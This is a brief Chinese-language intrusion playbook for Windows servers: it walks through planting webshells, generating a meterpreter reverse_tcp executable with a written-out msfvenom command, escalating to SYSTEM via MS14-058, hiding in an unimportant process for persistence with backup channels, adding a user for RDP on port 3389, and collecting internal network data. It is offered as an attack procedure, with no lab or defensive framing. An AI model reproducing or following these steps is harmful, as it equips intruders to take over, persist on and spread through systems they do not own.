主要思路

1.拿到webshell
2.上传大马
3.利用meterpreter模块生成payload
4.本地进行监听
5.进行提权
6.进行维权
7.生成新用户，连接3389

一、本地监听端口

①.生成payload
msfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe

②.上传123.exe
这里直接在大马上进行上传运行即可。（随便找一个有执行权限的目录即可）

③.msf本地监听端口，并运行123.exe

拿到NETWORK SERVICE权限，这个是windows内置用户，大概权限跟user差不多。

④.进行权限提升
我们这里利用ms14_058进行提权，可以影响win server 2008 r2一下的版本。

提权到system用户

⑤.写入进程，进行维权。

注意点：
1.写入进程写在不重要的进程中
2.多准备几条通道进行备用

⑥.进入shell进行用户添加，进行内网资料收集